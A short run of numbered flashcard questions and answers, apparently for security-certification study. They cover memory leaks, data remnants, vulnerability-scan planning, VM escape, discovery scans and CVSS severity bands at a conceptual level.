Memory leaks – occur when an application does not release memory after it has finished using it, so consumption grows until the process or host runs out of memory (a reliability and denial-of-service concern). Code review, static and dynamic analysis, and adherence to coding and design best practices help to prevent memory leaks.

188
Q

Data Remnants

A

Data remnants – occur when applications are removed but remnants of their data, including registry entries, configuration files, and cached credentials, are left behind. Specialty tools and apps are available to ensure that applications have been completely removed from a device.

189
Q

Your team is preparing for a vulnerability scan, and they are trying to evaluate relevant considerations. Which of the following is NOT a relevant consideration when planning a vulnerability scan?

A)scheduling
B)cost
C)performance
D)operations

A

The cost of a scan is typically not a main consideration. Even in scenarios where a third party is hired, the cost is typically not a deterrent when identifying vulnerabilities that are considered to be critical.

190
Q

Which of the following vulnerabilities is likely to only affect virtual machines?

A)CSRF
B)SQL injection
C)VM Escape
D)CSS

A

VM escape is likely to affect only virtual machines and virtual infrastructure. In an escape attack, the attacker has access to a single guest virtual machine and leverages a flaw in the hypervisor or its device emulation to break out of that guest and reach the host or the resources assigned to a different virtual machine.

191
Q

You have been asked to perform a vulnerability scan on all desktop computers used by the sales department, which are located throughout the network. You do not have a current inventory listing of these computers, so you decide to perform a discovery scan. Which scanning criteria have you already determined based on the type of scan being performed?

A)Vulnerability feed
B)Scope
C)Sensitivity levels
D)Data type

A

You have determined the scan's sensitivity level, because a discovery scan (used to create an inventory of assets through host or service discovery rather than to test for vulnerabilities) is itself one of the sensitivity levels at which a scan can be run. Scope, vulnerability feed, and data type are settings you would still have to choose.

192
Q

Your vulnerability analysis scan has identified several vulnerabilities and assigned them a CVSS score. Issue A has a score of 4.3, Issue B has a score of 9.1, Issue C has a score of 1.6, and Issue D has a score of 7.7. Which issue should take priority?

A)Issue D
B)Issue B
C)Issue A
D)Issue C

A

Issue B should take priority because it has the highest CVSS value of 9.1, which is considered a critical issue.

The Common Vulnerability Scoring System (CVSS) is a system of ranking discovered vulnerabilities based on pre-defined metrics (attack vector, attack complexity, privileges required, user interaction, scope, and impact on confidentiality, integrity and availability). This system ensures that the most critical vulnerabilities can be easily identified and addressed after a scan. Scores are awarded on a scale of 0 to 10, with the values having the following qualitative ranks (the CVSS v3.x severity bands):

0 – None
0.1 to 3.9 – Low
4.0 to 6.9 – Medium
7.0 to 8.9 – High
9.0 to 10.0 – Critical